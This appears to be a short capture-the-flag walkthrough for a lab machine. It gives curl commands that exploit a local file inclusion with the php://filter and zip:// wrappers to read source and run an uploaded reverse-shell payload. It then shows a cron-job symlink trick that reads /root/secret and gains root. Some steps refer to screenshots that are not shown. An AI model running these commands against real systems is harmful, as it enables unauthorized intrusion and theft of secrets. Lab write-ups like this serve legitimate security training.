80

There could be a possibility of LFI.
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=home --path-as-is
We get home.html
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=home --path-as-is | base64 -d > home.html
There seems to be .php added to the end We can also get upload.php the same way:
curl http://192.168.182.229/index.php?file=php://filter/read=convert.base64-encode/resource=upload --path-as-is | base64 -d > upload.php

We can upload our reverse shell: We get click here to download the file:
We get the name of the file. This zip will have our payload.php file.
curl http://192.168.182.229/index.php?file=zip://uploads/upload_1723720412.zip%23payload
We don't mention .php here because it seems .php
is appended to the filename.
To get a shell:
Running linpeas.sh: We find root running a cron job.
We can do a wildcard spare trick: Then we can use this to our advantage:
cd /var/www/html/uploads
touch @root.zip
ln -s /root/secret root.zip
Already enox.zip was present and linked to /root/secret so the password was already present: We have the secret. Using the password:
We are root
Last updated
Was this helpful?